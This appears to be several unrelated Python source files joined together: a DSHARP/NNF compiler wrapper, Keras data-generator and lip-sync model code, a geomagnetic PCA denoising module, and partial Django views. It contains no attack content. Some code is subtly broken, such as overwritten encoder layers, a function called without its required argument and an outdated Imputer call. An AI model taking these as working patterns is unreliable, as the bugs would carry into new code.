https://github.com/marcthurley/sharpSAT/issues/5
It was independently discovered by hypothesis during testing of this module.
"""
import io
import os
import subprocess
import tempfile
import typing as t
from nnf import NNF, And, Or, Var, false, true, dimacs
from nnf.util import Name
__all__ = ('load', 'loads', 'compile')
def load(
fp: t.TextIO, var_labels: t.Optional[t.Dict[int, Name]] = None
) -> NNF:
"""Load a sentence from an open file.
An optional ``var_labels`` dictionary can map integers to other names.
"""
def decode_name(num: int) -> Name:
if var_labels is not None:
return var_labels[num]
return num
fmt, nodecount, edges, varcount = fp.readline().split()
node_specs = dict(enumerate(line.split() for line in fp))
assert fmt == 'nnf'
nodes = {} # type: t.Dict[int, NNF]
for num, spec in node_specs.items():
if spec[0] == 'L':
if spec[1].startswith('-'):
nodes[num] = Var(decode_name(int(spec[1][1:])), False)
else:
nodes[num] = Var(decode_name(int(spec[1])))
elif spec[0] == 'A':
nodes[num] = And(nodes[int(n)] for n in spec[2:])
elif spec[0] == 'O':
nodes[num] = Or(nodes[int(n)] for n in spec[3:])
else:
raise ValueError("Can't parse line {}: {}".format(num, spec))
if int(nodecount) == 0:
raise ValueError("The sentence doesn't have any nodes.")
return nodes[int(nodecount) - 1]
def loads(s: str, var_labels: t.Optional[t.Dict[int, Name]] = None) -> NNF:
"""Load a sentence from a string."""
return load(io.StringIO(s), var_labels)
def compile(
sentence: And[Or[Var]],
executable: str = 'dsharp',
smooth: bool = False,
timeout: t.Optional[int] = None,
extra_args: t.Sequence[str] = ()
) -> NNF:
"""Run DSHARP to compile a CNF sentence to (s)d-DNNF.
This requires having DSHARP installed.
The returned sentence will be marked as deterministic.
:param sentence: The CNF sentence to compile.
:param executable: The path of the ``dsharp`` executable. If the
executable is in your PATH there's no need to set this.
:param smooth: Whether to produce a smooth sentence.
:param timeout: Tell DSHARP to give up after a number of seconds.
:param extra_args: Extra arguments to pass to DSHARP.
"""
args = [executable]
if smooth:
args.append('-smoothNNF')
if timeout is not None:
args.extend(['-t', str(timeout)])
args.extend(extra_args)
if not sentence.is_CNF():
raise ValueError("Sentence must be in CNF")
# Handle cases D# doesn't like
if not sentence.children:
return true
if false in sentence.children:
return false
var_labels = dict(enumerate(sentence.vars(), start=1))
var_labels_inverse = {v: k for k, v in var_labels.items()}
infd, infname = tempfile.mkstemp(text=True)
try:
with open(infd, 'w') as f:
dimacs.dump(sentence, f, mode='cnf', var_labels=var_labels_inverse)
outfd, outfname = tempfile.mkstemp()
try:
os.close(outfd)
proc = subprocess.Popen(
args + ['-Fnnf', outfname, infname],
stdout=subprocess.PIPE,
universal_newlines=True
)
log, _ = proc.communicate()
with open(outfname) as f:
out = f.read()
finally:
os.remove(outfname)
finally:
os.remove(infname)
if proc.returncode != 0:
raise RuntimeError(
"DSHARP failed with code {}. Log:\n\n{}".format(
proc.returncode, log
)
)
if out == 'nnf 0 0 0\n' or 'problem line expected' in log:
raise RuntimeError("Something went wrong. Log:\n\n{}".format(log))
if 'TIMEOUT' in log:
raise RuntimeError("DSHARP timed out after {} seconds".format(timeout))
if 'Theory is unsat' in log:
return false
if not out:
raise RuntimeError("Couldn't read file output. Log:\n\n{}".format(log))
result = loads(out, var_labels=var_labels)
result.mark_deterministic()
NNF.decomposable.set(result, True)
return result
|
<filename>generators.py
import numpy as np
import keras
from osgeo import gdal
class iasi_generator(keras.utils.Sequence):
"""Class for keras data generation on IASI dataset."""
def __init__(self, files, batch_size=32, selected_channels=None, shuffle=True, dim_red=None, meta=False, norm_coeffs=None):
"""'Initialization
batch_size : Size of batch to be returned
files : Should contain list of lists e.g [ [input_file1, target_file1], [input_file2, target_file2], ...]
or like [ [input_file1, target_file1, meta_file1], ...]
shuffle : True - Shuffels rows in files,
dim_red = dim_red : None or decomposition matrix of spectral dimension
on_epoch_end() :
selected_channels : list of None and arrays. if element is an array, it contains indicies along the last dimension.
this is to perform exclusion of some bands or areas in images.
"""
self.batch_size = batch_size
self.files = files
self.shuffle = shuffle
self.dim_red = dim_red
self.on_epoch_end()
self.norm_coeffs = norm_coeffs
if selected_channels:
self.selected_channels = selected_channels
else:
self.selected_channels = [None]*len(files[0])
self.shapes = []
if self.selected_channels:
for i, (el,ind) in enumerate(zip(files[0],self.selected_channels)):
if isinstance(ind, np.ndarray):
self.shapes.append(np.load(el)[..., ind].shape)
else:
self.shapes.append(np.load(el).shape)
else:
for el in files[0]:
self.shapes.append(np.load(el).shape)
def __len__(self):
"""Denotes the number of batches per epoch"""
return(int(np.floor(len(self.files) / self.batch_size)))
def __getitem__(self, index):
"""Generate one batch of data"""
# Generate indexes of the batch
indexes = self.indexes[index*self.batch_size:(index+1)*self.batch_size]
# Find list of IDs
batch_files = [self.files[k] for k in indexes]
# Generate data
data = self.__data_generation(batch_files)
return( data)
def on_epoch_end(self):
"""Updates indexes after each epoch"""
self.indexes = np.arange(len(self.files))
if self.shuffle == True:
np.random.shuffle(self.indexes)
def __data_generation(self, batch_files):
"""Generates data containing batch_size samples'
# X : (n_samples, *dim, n_channels)"""
# Create Empty arrays
data_list = []
for shp in self.shapes:
data_list.append(np.empty((self.batch_size, *shp)))
# Load data
for i in range(self.batch_size):
for j, (el, ind) in enumerate(zip(batch_files[i], self.selected_channels)):
if isinstance(ind, np.ndarray):
data_list[j][i] = np.load(el)[..., ind].astype('float32')
else:
data_list[j][i] = np.load(el).astype('float32')
if self.dim_red:
data_list[0][i] = np.dot(data_list[0].reshape((self.shapes[0]*self.shapes[1],self.shapes[2])), self.dim_red)
elif self.norm_coeffs:
data_list[0][i] = (data_list[0][i] - np.array(self.norm_coeffs[0]).reshape((1,1,1,len(self.norm_coeffs[0]))) ) / np.array(self.norm_coeffs[1]).reshape((1,1,1,len(self.norm_coeffs[1])))
# if data_aug:
# # add code for data augmentation here...
return(data_list) |
<gh_stars>100-1000
from keras.models import load_model
import numpy as np
from keras.optimizers import Adam
from keras.models import Model
from keras.layers import Dense, Conv2DTranspose, Conv2D, BatchNormalization, \
Activation, Concatenate, Input, MaxPool2D,\
UpSampling2D, ZeroPadding2D, Lambda, Add
from keras.callbacks import ModelCheckpoint
from keras import backend as K
import keras
import cv2
import os
import librosa
import scipy
from keras.utils import plot_model
import tensorflow as tf
from keras.utils import multi_gpu_model
from discriminator import contrastive_loss
class ModelMGPU(Model):
def __init__(self, ser_model, gpus):
pmodel = multi_gpu_model(ser_model, gpus)
self.__dict__.update(pmodel.__dict__)
self._smodel = ser_model
def __getattribute__(self, attrname):
'''Override load and save methods to be used from the serial-model. The
serial-model holds references to the weights in the multi-gpu model.
'''
# return Model.__getattribute__(self, attrname)
if 'load' in attrname or 'save' in attrname:
return getattr(self._smodel, attrname)
return super(ModelMGPU, self).__getattribute__(attrname)
def conv_block(x, num_filters, kernel_size=3, strides=1, padding='same', act=True):
x = Conv2D(filters=num_filters, kernel_size= kernel_size,
strides=strides, padding=padding)(x)
x = BatchNormalization(momentum=.8)(x)
if act:
x = Activation('relu')(x)
return x
def conv_t_block(x, num_filters, kernel_size=3, strides=2, padding='same'):
x = Conv2DTranspose(filters=num_filters, kernel_size= kernel_size,
strides=strides, padding=padding)(x)
x = BatchNormalization(momentum=.8)(x)
x = Activation('relu')(x)
return x
def create_model(args):
############# encoder for face/identity
input_face = Input(shape=(args.img_size, args.img_size, 6), name="input_face")
identity_mapping = conv_block(input_face, 32, kernel_size=11) # 96x96
x1_face = conv_block(identity_mapping, 64, kernel_size=7, strides=2) # 48x48
x2_face = conv_block(x1_face, 128, 5, 2) # 24x24
x3_face = conv_block(x2_face, 256, 3, 2) #12x12
x4_face = conv_block(x3_face, 512, 3, 2) #6x6
x5_face = conv_block(x4_face, 512, 3, 2) #3x3
x6_face = conv_block(x5_face, 512, 3, 1, padding='valid')
x7_face = conv_block(x6_face, 256, 1, 1)
############# encoder for audio
input_audio = Input(shape=(12,35,1), name="input_audio")
x = conv_block(input_audio, 64)
x = conv_block(input_audio, 128)
x = ZeroPadding2D(((1,0),(0,0)))(x)
x = conv_block(x, 256, strides=(1, 2))
x = conv_block(x, 256)
x = conv_block(x, 256, strides=2)
x = conv_block(x, 512, strides=2)
x = conv_block(x, 512, (4, 5), 1, padding='valid')
x = conv_block(x, 256, 1, 1)
embedding = Concatenate(axis=3)([x7_face, x])
############# decoder
x = conv_block(embedding, 512, 1)
x = conv_t_block(embedding, 512, 3, 3)# 3x3
x = Concatenate(axis=3) ([x5_face, x])
x = conv_t_block(x, 512) #6x6
x = Concatenate(axis=3) ([x4_face, x])
x = conv_t_block(x, 256) #12x12
x = Concatenate(axis=3) ([x3_face, x])
x = conv_t_block(x, 128) #24x24
x = Concatenate(axis=3) ([x2_face, x])
x = conv_t_block(x, 64) #48x48
x = Concatenate(axis=3) ([x1_face, x])
x = conv_t_block(x, 32) #96x96
x = Concatenate(axis=3) ([identity_mapping, x])
x = conv_block(x, 16) #96x96
x = conv_block(x, 16) #96x96
x = Conv2D(filters=3, kernel_size=1, strides=1, padding="same") (x)
prediction = Activation("sigmoid", name="prediction")(x)
model = Model(inputs=[input_face, input_audio], outputs=prediction)
model.summary()
ser_model = model
if args.n_gpu > 1:
parallel_model = ModelMGPU(ser_model , args.n_gpu)
else:
parallel_model = ser_model
parallel_model.compile(loss='mae', optimizer=(Adam(lr=args.lr) if hasattr(args, 'lr') else 'adam'))
return parallel_model, ser_model
def create_model_residual(args):
def residual_block(inp, num_filters):
x = conv_block(inp, num_filters)
x = conv_block(x, num_filters)
x = Add()([x, inp])
x = Activation('relu') (x)
return x
############# encoder for face/identity
input_face = Input(shape=(args.img_size, args.img_size, 6), name="input_face")
identity_mapping = conv_block(input_face, 32, kernel_size=7) # 96x96
x1_face = conv_block(identity_mapping, 64, kernel_size=5, strides=2) # 48x48
x1_face = residual_block(x1_face, 64)
x1_face = residual_block(x1_face, 64)
x2_face = conv_block(x1_face, 128, 3, 2) # 24x24
x2_face = residual_block(x2_face, 128)
x2_face = residual_block(x2_face, 128)
x2_face = residual_block(x2_face, 128)
x3_face = conv_block(x2_face, 256, 3, 2) #12x12
x3_face = residual_block(x3_face, 256)
x3_face = residual_block(x3_face, 256)
x4_face = conv_block(x3_face, 512, 3, 2) #6x6
x4_face = residual_block(x4_face, 512)
x4_face = residual_block(x4_face, 512)
x5_face = conv_block(x4_face, 512, 3, 2) #3x3
x6_face = conv_block(x5_face, 512, 3, 1, padding='valid')
x7_face = conv_block(x6_face, 512, 1, 1)
############# encoder for audio
input_audio = Input(shape=(12,35,1), name="input_audio")
x = conv_block(input_audio, 128)
x = residual_block(x, 128)
x = residual_block(x, 128)
x = residual_block(x, 128)
x = ZeroPadding2D(((1,0),(0,0)))(x)
x = conv_block(x, 256, strides=(1, 2))
x = residual_block(x, 256)
x = residual_block(x, 256)
x = conv_block(x, 512, strides=2)
x = residual_block(x, 512)
x = residual_block(x, 512)
x = conv_block(x, 512, strides=2)
x = residual_block(x, 512)
x = conv_block(x, 512, (4, 5), 1, padding='valid')
x = conv_block(x, 512, 1, 1)
embedding = Concatenate(axis=3)([x7_face, x])
############# decoder
x = conv_t_block(embedding, 512, 3, 3)# 3x3
x = Concatenate(axis=3) ([x5_face, x])
x = conv_t_block(x, 512) #6x6
x = residual_block(x, 512)
x = residual_block(x, 512)
x = Concatenate(axis=3) ([x4_face, x])
x = conv_t_block(x, 256) #12x12
x = residual_block(x, 256)
x = residual_block(x, 256)
x = Concatenate(axis=3) ([x3_face, x])
x = conv_t_block(x, 128) #24x24
x = residual_block(x, 128)
x = residual_block(x, 128)
x = Concatenate(axis=3) ([x2_face, x])
x = conv_t_block(x, 64) #48x48
x = residual_block(x, 64)
x = residual_block(x, 64)
x = Concatenate(axis=3) ([x1_face, x])
x = conv_t_block(x, 32) #96x96
x = Concatenate(axis=3) ([identity_mapping, x])
x = conv_block(x, 16) #96x96
x = conv_block(x, 16) #96x96
x = Conv2D(filters=3, kernel_size=1, strides=1, padding="same") (x)
prediction = Activation("sigmoid", name="prediction")(x)
model = Model(inputs=[input_face, input_audio], outputs=prediction)
model.summary()
if args.n_gpu > 1:
model = ModelMGPU(model , args.n_gpu)
model.compile(loss='mae', optimizer=(Adam(lr=args.lr) if hasattr(args, 'lr') else 'adam'))
return model
def create_combined_model(generator, discriminator, args):
input_face = Input(shape=(args.img_size, args.img_size, 6), name="input_face_comb")
input_audio = Input(shape=(12, 35, 1), name="input_audio_comb")
fake_face = generator([input_face, input_audio])
discriminator.trainable = False
d = discriminator([fake_face, input_audio])
model = Model([input_face, input_audio], [fake_face, d])
if args.n_gpu > 1:
model = ModelMGPU(model , args.n_gpu)
model.compile(loss=['mae', contrastive_loss],
optimizer=(Adam(lr=args.lr) if hasattr(args, 'lr') else 'adam'), loss_weights=[1., .01])
return model
if __name__ == '__main__':
model = create_model_residual()
#plot_model(model, to_file='model.png', show_shapes=True) |
<filename>magpysv/denoise.py<gh_stars>10-100
# -*- coding: utf-8 -*-
# Copyright (C) 2016 <NAME> (University of Liverpool)
#
# Released under the MIT license, a copy of which is located at the root of
# this project.
"""Module containing functions to remove external signal from geomagnetic data.
Part of the MagPySV package for geomagnetic data analysis. This module provides
various functions to denoise geomagnetic data by performing principal component
analysis and identifying and removing outliers. Also contains an outlier
detection function based on median absolute deviation from the median (MAD).
"""
import pandas as pd
import magpysv.plots as plots
import numpy as np
from sklearn.decomposition import PCA as sklearnPCA
try:
from sklearn.preprocessing import Imputer
except ImportError:
from sklearn.impute import SimpleImputer as Imputer
def eigenvalue_analysis_impute(*, dates, obs_data, model_data, residuals,
proxy_number=1):
"""Remove external signal from SV data using Principal Component Analysis.
Perform principal component analysis (PCA) on secular variation
residuals (the difference between the observed SV and that predicted by a
geomagnetic field model) calculated from annual differences of monthly
means at several observatories. Uses the imputer from sklearn.preprocessing
to fill in missing data points and calculates the singular values of the
data matrix for n observatories (uses Singular Values Decomposition, SVD).
The residuals are rotated into the eigendirections and denoised using the
method detailed in Wardinski & Holme (2011, GJI,
https://doi.org/10.1111/j.1365-246X.2011.04988.x). The SV residuals of the
noisy component for all observatories combined are used as a proxy for the
unmodelled external signal. The denoised data are then rotated back into
geographic coordinates. The pca algorithm outputs the singular values
(these are equal to the square root of the eigenvalues of the covariance
matrix) sorted from largest to smallest, so the corresponding eigenvector
matrix has the 'noisy' direction in the first column and the 'clean'
direction in the final column.
Note that the SVD algorithm cannot be used if any data are missing, which
is why imputation is needed with this method. The function
denoise.eigenvalue_analysis permits missing values and does not
infill them - that is the more robust function.
Smallest eigenvalue: 'quiet' direction
Largest eiegenvalue: 'noisy' direction
Args:
dates (datetime.datetime): dates of the time series measurements.
obs_data (pandas.DataFrame): dataframe containing columns for
monthly/annual means of the X, Y and Z components of the secular
variation at the observatories of interest.
model_data (pandas.DataFrame): dataframe containing columns for field
model prediction of the X, Y and Z components of the secular
variation at the same observatories as in obs_data.
residuals (pandas.DataFrame): dataframe containing the SV residuals
(difference between the observed data and model prediction).
proxy_number (int): the number of 'noisy' directions used to create
the proxy for the external signal removal. Default value is 1 (only
the residual in the direction of the largest eigenvalue is used).
Using n directions means that proxy is the sum of the SV residuals
in the n noisiest eigendirections.
Returns:
(tuple): tuple containing:
- denoised_sv (*pandas.DataFrame*):
dataframe with dates in the first
column and columns for the denoised X, Y and Z secular variation
components at each of the observatories for which data were
provided.
- proxy (*array*):
the signal that was used as a proxy for unmodelled
external magnetic field in the denoising stage.
- eig_values (*array*):
the singular values of the obs_data matrix.
- eig_vectors (*array*):
the eigenvectors associated with the n largest
singular values of the data matrix. For example, if the residuals
in the two 'noisiest' directions are used as the proxy for external
signal, then these two eigenvectors are returned.
- projected_residuals (*array*):
SV residuals rotated into the eigendirections.
- corrected_residuals (*array*):
SV residuals after the denoising process.
"""
# Fill in missing SV values (indicated as NaN in the data files)
imp = Imputer(missing_values='NaN', strategy='mean', axis=0)
imputed_residuals = imp.fit_transform(residuals)
pca = sklearnPCA()
projected_residuals = pca.fit_transform(imputed_residuals)
eig_values = pca.explained_variance_
eig_vectors = pca.components_
# Use the method of Wardinski & Holme (2011) to remove unmodelled external
# signal in the SV residuals. The variable 'proxy' contains the noisy
# component residual for all observatories combined
corrected_residuals = []
if proxy_number == 1:
noisy_direction = eig_vectors[:, 0]
proxy = projected_residuals[:, 0]
for idx in range(len(proxy)):
corrected_residuals.append(
imputed_residuals.data[idx, :] - proxy[idx] * noisy_direction)
elif proxy_number > 1:
noisy_direction = eig_vectors[:, 0:proxy_number]
proxy = np.sum(projected_residuals[:, 0:proxy_number], axis=1)
for idx in range(len(projected_residuals[:, 0])):
corrected = imputed_residuals.data[idx, :]
for direction in range(proxy_number):
corrected = corrected - projected_residuals[idx, direction] \
* noisy_direction[:, direction]
corrected_residuals.append(corrected)
corrected_residuals = pd.DataFrame(corrected_residuals,
columns=obs_data.columns)
denoised_sv = pd.DataFrame(
corrected_residuals.values + model_data.values,
columns=obs_data.columns)
denoised_sv.insert(0, 'date', dates)
return denoised_sv, proxy, eig_values, eig_vectors, projected_residuals,\
corrected_residuals.astype('float')
def eigenvalue_analysis(*, dates, obs_data, model_data, residuals,
proxy_number=1):
"""Remove external signal from SV data using principal Component Analysis.
Perform principal component analysis (PCA) on secular variation
residuals (the difference between the observed SV and that predicted by a
geomagnetic field model) calculated from annual differences of monthly
means at several observatories. Uses masked arrays to discount missing data
points and calculates the eigenvalues/vectors of the (3nx3n) covariance
matrix for n observatories. The residuals are rotated into the
eigendirections and denoised using the method detailed in Wardinski & Holme
(2011, GJI, https://doi.org/10.1111/j.1365-246X.2011.04988.x). The SV
residuals of the noisy component for all observatories
combined are used as a proxy for the unmodelled external signal. The
denoised data are then rotated back into geographic coordinates. The PCA
algorithm outputs the eigenvalues sorted from largest to smallest, so the
corresponding eigenvector matrix has the 'noisy' direction in the first
column and the 'clean' direction in the final column.
This algorithm masks missing data so that they are not taken into account
during the PCA. Missing values are not infilled or estimated, so NaN
values in the input dataframe are given as NaN values in the output.
Smallest eigenvalue 'quiet' direction
Largest eiegenvalue 'noisy' direction
Args:
dates (datetime.datetime): dates of the time series measurements.
obs_data (pandas.DataFrame): dataframe containing columns for
monthly/annual means of the X, Y and Z components of the secular
variation at the observatories of interest.
model_data (pandas.DataFrame): dataframe containing columns for field
model prediction of the X, Y and Z components of the secular
variation at the same observatories as in obs_data.
residuals (pandas.DataFrame): dataframe containing the SV residuals
(difference between the observed data and model prediction).
proxy_number (int): the number of 'noisy' directions used to create
the proxy for the external signal removal. Default value is 1 (only
the residual in the direction of the largest eigenvalue is used).
Using n directions means that proxy is the sum of the SV residuals
in the n noisiest eigendirections.
Returns:
(tuple): tuple containing:
- denoised_sv (*pandas.DataFrame*):
dataframe with datetime objects in the
first column and columns for the denoised X, Y and Z SV components
at each of the observatories for which data were provided.
- proxy (*array*):
the signal that was used as a proxy for unmodelled
external magnetic field in the denoising stage.
- eig_values (*array*):
the eigenvalues of the obs_data matrix.
- eig_vectors (*array*):
the eigenvectors associated with the n largest
eigenvalues of the data matrix. For example, if the residuals
in the two 'noisiest' directions are used as the proxy for external
signal, then these two eigenvectors are returned.
- projected_residuals (*array*):
SV residuals rotated into the eigendirections.
- corrected_residuals (*array*):
SV residuals after the denoising process.
- covariance_matrix (*array*): residuals covariance matrix.
"""
# Create a masked version of the residuals array so that we can perform the
# PCA ignoring all nan values
masked_residuals = np.ma.array(residuals, mask=np.isnan(residuals))
# Calculate the covariance matrix of the masked residuals array
covariance_matrix = np.ma.cov(masked_residuals, rowvar=False,
allow_masked=True)
# Calculate the eigenvalues and eigenvectors of the covariance matrix
eig_values, eig_vectors = np.linalg.eig(covariance_matrix)
# Sort the absolute values of the eigenvalues in decreasing order
idx = np.argsort(np.abs(eig_values))[::-1]
eig_values = eig_values[idx]
# Sort the eigenvectors according to the same index
eig_vectors = eig_vectors[:, idx]
# Project the residuals onto the eigenvectors
projected_residuals = np.ma.dot(masked_residuals, eig_vectors)
# Use the method of Wardinski & Holme (2011) to remove unmodelled external
# signal in the SV residuals. The variable 'proxy' contains the noisy
# component residual for all observatories combined
corrected_residuals = []
if proxy_number == 1:
noisy_direction = eig_vectors[:, 0]
proxy = projected_residuals[:, 0]
for idx in range(len(proxy)):
corrected_residuals.append(
masked_residuals.data[idx, :] - proxy[idx] * noisy_direction)
elif proxy_number > 1:
noisy_direction = eig_vectors[:, 0:proxy_number]
proxy = np.sum(projected_residuals[:, 0:proxy_number], axis=1)
for idx in range(len(projected_residuals[:, 0])):
corrected = masked_residuals.data[idx, :]
for direction in range(proxy_number):
corrected = corrected - projected_residuals[idx, direction] \
* noisy_direction[:, direction]
corrected_residuals.append(corrected)
corrected_residuals = pd.DataFrame(corrected_residuals,
columns=obs_data.columns)
denoised_sv = pd.DataFrame(
corrected_residuals.values + model_data.values,
columns=obs_data.columns)
denoised_sv.insert(0, 'date', dates)
return denoised_sv, proxy, np.abs(eig_values), eig_vectors,\
projected_residuals, corrected_residuals.astype('float'),\
covariance_matrix
def detect_outliers(*, dates, signal, obs_name, window_length, threshold,
signal_type='SV', plot_fig=False, save_fig=False,
write_path=None, fig_size=(8, 6), font_size=12,
label_size=16):
"""Detect outliers in a time series and remove them.
Use the median absolute deviation from the median (MAD) to identify
outliers. The time series are long and highly variable so it is not
appropriate to use single values of median to represent the whole series.
The function uses a running median to better characterise the series
(the window length and a threshold value stating many MADs from the median
a point must be before it is classed as an outlier are user-specified).
Args:
dates (datetime.datetime): dates of the time series measurements.
signal (array): array (or column from a pandas.DataFrame) containing
the time series of interest.
obs_name (str): states the component of interest and the three digit
IAGA observatory name.
window_length (int): number of months over which to take the running
median.
threshold (float): the minimum number of median absolute deviations a
point must be away from the median in order to be considered an
outlier.
signal_type (str): specify whether magnetic field ('MF') or secular
variation ('SV') is plotted. Defaults to SV.
plot_fig (bool): option to plot figure of the time series and
identified outliers. Defaults to False.
save_fig (bool): option to save figure if plotted. Defaults to False.
write_path (str): output path for figure if saved.
fig_size (array): figure size in inches. Defaults to 8 inches by 6
inches.
font_size (int): font size for axes. Defaults to 12 pt.
label_size (int): font size for axis labels. Defaults to 16 pt.
Returns:
signal (array):
the input signal with identified outliers removed (set to NaN).
"""
signal_temp = pd.DataFrame(data=signal.copy())
# Account for missing values when using rolling_median and rolling_std.
# ffill (bfill) propagates the closest value forwards (backwards) through
# nan values. E.g. [np.nan, np.nan, 1, 9, 7, np.nan, np.nan] returns as
# [1, 1, 1, 9, 7, 7, 7]. The limit of half the window length is used so the
# first ffill cannot overwrite the beginning of the next valid interval
# (bfill values are used there instead).
signal_temp = signal_temp.ffill(limit=int(window_length / 2 + 1)).bfill()
# calculate the running median and median absolute standard deviation
running_median = signal_temp.rolling(window=window_length,
center=True).median().bfill().ffill()
diff = (signal_temp - running_median).abs()
med_abs_deviation = diff.rolling(window=window_length,
center=True).median().bfill().ffill()
# Normalise the median abolute deviation
modified_z_score = diff / med_abs_deviation
# Identify outliers
outliers = signal_temp[modified_z_score > threshold]
# Plot the outliers and original time series if required
if plot_fig is True:
plots.plot_outliers(dates=dates, obs_name=obs_name, signal=signal,
outliers=outliers, save_fig=save_fig,
write_path=write_path, fig_size=fig_size,
font_size=font_size, label_size=label_size,
signal_type=signal_type)
# Set the outliers to NaN
idx = np.where(modified_z_score > threshold)[0]
signal.iloc[idx] = np.nan
return signal.astype('float')
|
<reponame>ungleich/mri-connect
import logging
from django.conf import settings
from django.contrib import messages
from django.contrib.auth import get_user_model
from django.contrib.auth.mixins import LoginRequiredMixin
from django.contrib.gis.db.models import F, Q, Value
from django.contrib.sites.shortcuts import get_current_site
from django.core.mail import EmailMessage
from django.db.models.functions import Concat
from django.forms.models import ModelMultipleChoiceField, fields_for_model
from django.shortcuts import get_object_or_404, redirect, render
from django.template import loader
from django.urls import reverse_lazy
from django.views import generic
from . import data
from .forms import (AdvancedSearchForm, AffiliationForm, ContactForm,
CustomUserCreationForm, ExpertiseForm, ProfileForm,
ProjectForm, SearchForm)
from .models import Affiliation, Expertise, Project, User
from .selector import get_user_profile
from .utils.common import Q_if_truthy, non_zero_keys
from .utils.importdata import classify_expertise
from .utils.mailchimp import Mailchimp
logger = logging.getLogger(__name__)
class TitleMixin:
title = None
def get_context_data(self, **kwargs):
context = super().get_context_data(**kwargs)
context.update({'title': self.title})
return context
class GoogleMapAPIKeyMixin:
def get_context_data(self, **kwargs):
context = super().get_context_data(**kwargs)
context["google_map_api_key"] = settings.MAP_WIDGETS["GOOGLE_MAP_API_KEY"]
return context
class Index(TitleMixin, generic.TemplateView):
template_name = "expert_management/index.html"
title = "Homepage"
class MyProfileRedirectView(generic.RedirectView):
permanent = False
def get_redirect_url(self, *args, **kwargs):
return reverse_lazy("profile", args=[self.request.user.username])
class Signup(TitleMixin, generic.CreateView):
form_class = CustomUserCreationForm
template_name = "registration/signup.html"
success_url = reverse_lazy("login")
title = "Signup"
class Profile(GoogleMapAPIKeyMixin, generic.DetailView):
queryset = get_user_model().objects.all()
pk_url_kwarg = "username"
template_name = "expert_management/profile.html"
def get_context_data(self, **kwargs):
user = self.get_object()
full_name = " ".join([user.first_name, user.last_name])
context = super().get_context_data(**kwargs)
context.update({'title': full_name})
return context
def get_object(self, queryset=None):
username = self.kwargs.get(self.pk_url_kwarg)
return get_user_profile(username, self.request.user)
class UpdateProfile(TitleMixin, LoginRequiredMixin, generic.UpdateView):
model = get_user_model()
template_name = "expert_management/set-profile.html"
success_url = reverse_lazy("my-profile")
title = "Update Profile"
form_class = ProfileForm
# fields = fields_for_model(model, exclude=data.AUTH_SPECIFIC_FIELDS)
def get_object(self, queryset=None):
return self.request.user
def form_valid(self, form):
form.instance.user = self.request.user
mailchimp = Mailchimp()
# NOTE: We can do little optimization here i.e checking whether is_subscribed_to_newsletter
# changed or not. and if changed then we can update the mailchimp. We can check that using
# if 'is_subscribed_to_newsletter' in form.changed_data but it have some quirky behavior and
# I do not want to optimize it prematurely
if form.instance.user.is_subscribed_to_newsletter:
mailchimp.add_member(form.instance.user.email, settings.MAILCHIMP_LIST_ID)
else:
mailchimp.delete_member(form.instance.user.email, settings.MAILCHIMP_LIST_ID)
return super().form_valid(form)
class ProjectList(TitleMixin, GoogleMapAPIKeyMixin, LoginRequiredMixin, generic.ListView):
title = "My Projects"
def get_queryset(self):
return Project.objects.filter(user=self.request.user)
class CreateProject(TitleMixin, GoogleMapAPIKeyMixin, LoginRequiredMixin, generic.CreateView):
form_class = ProjectForm
template_name = "expert_management/set-project.html"
success_url = reverse_lazy("projects")
title = "Create Project"
def form_valid(self, form):
form.instance.user = self.request.user
return super().form_valid(form)
class UpdateProject(TitleMixin, GoogleMapAPIKeyMixin, LoginRequiredMixin, generic.UpdateView):
form_class = ProjectForm
template_name = "expert_management/set-project.html"
success_url = reverse_lazy("projects")
title = "Update Project"
def get_queryset(self, queryset=None):
if queryset is None:
queryset = Project.objects.filter(user=self.request.user)
return queryset
def form_valid(self, form):
form.instance.user = self.request.user
return super().form_valid(form)
class DeleteProject(TitleMixin, LoginRequiredMixin, generic.DeleteView):
success_url = reverse_lazy("projects")
title = "Confirm Project Deletion"
def get_queryset(self):
return Project.objects.filter(user=self.request.user)
class AffiliationList(TitleMixin, GoogleMapAPIKeyMixin, LoginRequiredMixin, generic.ListView):
title = "My Affiliations (created by me)"
def get_queryset(self):
return Affiliation.objects.filter(creator=self.request.user)
class CreateAffiliation(TitleMixin, GoogleMapAPIKeyMixin, LoginRequiredMixin, generic.CreateView):
form_class = AffiliationForm
template_name = "expert_management/set-affiliation.html"
success_url = reverse_lazy("affiliations")
title = "Create Affiliation"
def form_valid(self, form):
form.instance.creator = self.request.user
return super().form_valid(form)
class UpdateAffiliation(TitleMixin, GoogleMapAPIKeyMixin, LoginRequiredMixin, generic.UpdateView):
form_class = AffiliationForm
template_name = "expert_management/set-affiliation.html"
success_url = reverse_lazy("affiliations")
title = "Update Affiliation"
def get_queryset(self, queryset=None):
if queryset is None:
queryset = Affiliation.objects.filter(creator=self.request.user)
return queryset
def form_valid(self, form):
form.instance.creator = self.request.user
return super().form_valid(form)
class CreateExpertise(TitleMixin, LoginRequiredMixin, generic.CreateView):
model = Expertise
form_class = ExpertiseForm
template_name = "expert_management/set-expertise.html"
success_url = reverse_lazy("my-profile")
title = "Update Expertise"
def form_valid(self, form):
form.instance.user = self.request.user
return super().form_valid(form)
def get(self, *args, **kwargs):
try:
self.model.objects.get(user=self.request.user)
except self.model.DoesNotExist:
return super().get(*args, **kwargs)
else:
return redirect('update-expertise')
class UpdateExpertise(TitleMixin, LoginRequiredMixin, generic.UpdateView):
model = Expertise
form_class = ExpertiseForm
template_name = "expert_management/set-expertise.html"
success_url = reverse_lazy("my-profile")
title = "Update Expertise"
def form_valid(self, form):
form.instance.user = self.request.user
return super().form_valid(form)
def get_object(self, queryset=None):
if queryset is None:
queryset = self.model.objects.filter(user=self.request.user)
return queryset.get(user=self.request.user)
def get(self, *args, **kwargs):
try:
self.model.objects.get(user=self.request.user)
except self.model.DoesNotExist:
return redirect('create-expertise')
else:
return super().get(*args, **kwargs)
class Search(TitleMixin, generic.TemplateView):
template_name = "expert_management/search.html"
title = 'Search'
def get_context_data(self, **kwargs):
context = super().get_context_data(**kwargs)
context['form'] = SearchForm
return context
class AdvancedSearch(TitleMixin, generic.TemplateView):
template_name = "expert_management/advanced-search.html"
title = 'Advanced Search'
def get_context_data(self, **kwargs):
context = super().get_context_data(**kwargs)
context['form'] = AdvancedSearchForm
return context
class SearchResultView(TitleMixin, generic.ListView):
template_name = "expert_management/search-result.html"
model = get_user_model()
title = "Search Result"
def get_queryset(self):
other_expertise_fields = [
"other_expertise", "other_spatial_scale_of_expertise", "other_statistical_focus",
"other_time_scales", "other_methods", "other_participation_in_assessments",
"more_detail_about_participation_in_assessments", "other_inputs_or_participation_to_un_conventions",
